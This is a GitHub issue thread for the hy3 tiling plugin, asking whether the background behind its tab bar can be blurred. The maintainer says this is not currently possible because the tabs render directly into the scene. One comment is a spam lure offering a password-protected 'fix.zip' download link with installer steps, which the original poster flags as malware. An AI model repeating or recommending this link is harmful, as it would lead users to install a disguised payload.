### ISSUE TITLE
Option to blur background behind tab bar

### ISSUE THREAD

**Issue by BBaoVanC** [outfoxxed/hy3#138]
I didn't see this anywhere in the docs, is there a way to do this? I know for waybar you have to `layerrule = blur, waybar`, but I don't see anything for hy3. How does the rendering even work, does it use Hyprland internals where blurring inside Hyprland would also apply to hy3?

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BBaoVanC** [comment]
^ this is malware, please do not download it.

**Comment by outfoxxed** [comment]
Not possible currently, as hy3 tabs aren't windows or layers, but directly rendered into the scene. I haven't looked into exactly how blur works, and probably won't get to it for some time.
